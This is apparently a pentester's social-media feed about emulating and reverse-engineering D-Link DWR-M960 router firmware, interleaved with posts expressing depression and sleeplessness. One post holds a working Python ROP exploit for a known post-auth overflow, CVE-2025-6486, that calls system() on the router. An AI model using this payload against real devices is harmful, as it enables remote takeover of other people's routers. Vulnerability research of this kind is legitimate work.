Clathetic

@[email protected]
24 Followers
58 Following
134 Posts
Pentest, OSINT, reverse engineering, RCE/LPE addict.
My name is Johnny Clathetic.
Dark thought and weird to understand jokes. "If you don't understand, assume that I'm dumb."
https://heapdump.alwaysdata.net/
Clathetic3d ago
another night.. Sleepless. I keep thinking about all the things I missed, all the mistakes that mattered more than I admitted.
ClatheticMar 13
I'm alone, sad and tired. I want to bang my head on the wall to stop thinking. I see sparkles and reality become an insane nigthmare. I can't take a break, I want to be a stone to stop this suffering but life doesn't remain in rocks. That's unfortunate. Why human brain doesn't have a stop switch? It would be so simple to turn it off for a few hours. Mys eyes hurts and I can't sleep.
ClatheticMar 2
When I’m deep in another depressive slump, I open IDA and start defining structures. It’s one of the few things that settles my mind. Watching raw decompilation slowly become something structured feels like carving a little bit of order out of the chaos in my head.
ClatheticFeb 25

Even trying was a failure. Everything I touch turns into a miserable failure.

It wasn't even a glamorous bug, just a small, post-auth crack in the plaster. Still, I thought it was mine for a few hours. I traced it, mapped it, coaxed it into an exploit. I let myself feel that quiet, private satisfaction that maybe, just maybe, I’d seen something no one else had.

I should have googled "/boafrm/formWlanMultipleAP" before trying anything. It turns out it’s been known for at least a year. https://www.cve.org/CVERecord?id=CVE-2025-6486
The exploit works. The code runs. The world just doesn’t care. I keep staring at my reflection in the window, trying to remember when I started mistaking echoes for discoveries. I sit there with my rotted PoC, my notes, my late afternoon optimism, and realize I celebrated too loudly in an empty room. The window’s open. The air is fresh and honest in a way I’m not sure I deserve tonight.

ClatheticFeb 25

and here is the POC, ugly, but working:
```
#! /usr/bin/python3

import requests
import sys

# just auth with a browsre and grab cookie
# the js code is awful, I'm too bored to reverse it
cookies = {"webuicookie":sys.argv[1]}
host="http://127.0.0.1" #adjust

# We need to browse /wlmultipleap.htm first
page1="/wlmultipleap.htm"
# otherwise form is not accessible
page2="/boafrm/formWlanMultipleAP"

r = requests.get(host+page1, cookies=cookies)
hdr={"Content-Type": "application/x-www-form-urlencoded"}

data="wlanIdx=wlanidx&wl_ssid1=wl_ssid&submit-url="
data = data+"%2f"+"aa;echo dlink dwrM960_is_pwned>/tmp/pwn; id >> /tmp/pwn;"+"a"*209
data = data+"%e8%50%d5%3F" #system() @ in libc : 0x3fd25000+0x300E8 : s0 register
data = data+"aaaaaabaacaadaaeaafaagaahaaiaaja" #pad
data = data+"%1C%F4%D3%3F" #gadget@ move t9,s0; jalr t9, lw a0,64(sp)
data = data+"akaalaamaanaaoaapaaqaaraasaataauaavaawaaxaayaazabaabbabcabdabeab" #pad
data = data+"%C8%01%80%40" #stack addr 0x408001c8
data = data+"fabgabhabiabjabkablabmabnaboabpabqabrabsabtabuabvabwabxabyabzacaacbaccacdaceacfacgachaciacjackaclacmac.htm" #pad

r = requests.post(host+page2, cookies=cookies, headers=hdr, data=data)
```
In my poc, i wanted to do:
`echo dlink dwrM960_is_pwned>/tmp/pwn; id >> /tmp/pwn;`
but the id applet is not compiled in the busybox :D :D

Show threadClatheticFeb 25
is it a #0day ? yeah I guess?
The sub_455480 function is flawed. This function parses some data sent to boafrm/formWlanMultipleAP. Guess what it does with the submit-url parameter? Yep, printf to a stack var. We can't use null bytes, but libc is loaded at 0x3fd25000 so it's not a problem (and ASLR/PIE is nonexistent on those small routers), so everything can be hardcoded.
ClatheticFeb 25
at last. Finally got RCE on the DLINK DWR M960
Show threadClatheticFeb 24
go exploit, or play with firmae now?
Show threadClatheticFeb 24

"FirmAE is a fully-automated framework that performs emulation and vulnerability analysis. FirmAE significantly increases the emulation success rate (From Firmadyne's 16.28% to 79.36%) with five arbitration techniques. We tested FirmAE on 1,124 wireless-router and IP-camera firmware images from top eight vendors."

ok. Definitely take a look for this one.

Show threadClatheticFeb 24
ok, I'm definitvely a dumbass. The title in the xterm clearly says: "firmae".
And with a bit of googling, we find the github:
https://github.com/pr0v3rbs/FirmAE
GitHub - pr0v3rbs/FirmAE: Towards Large-Scale Emulation of IoT Firmware for Dynamic Analysis

Towards Large-Scale Emulation of IoT Firmware for Dynamic Analysis - pr0v3rbs/FirmAE

GitHub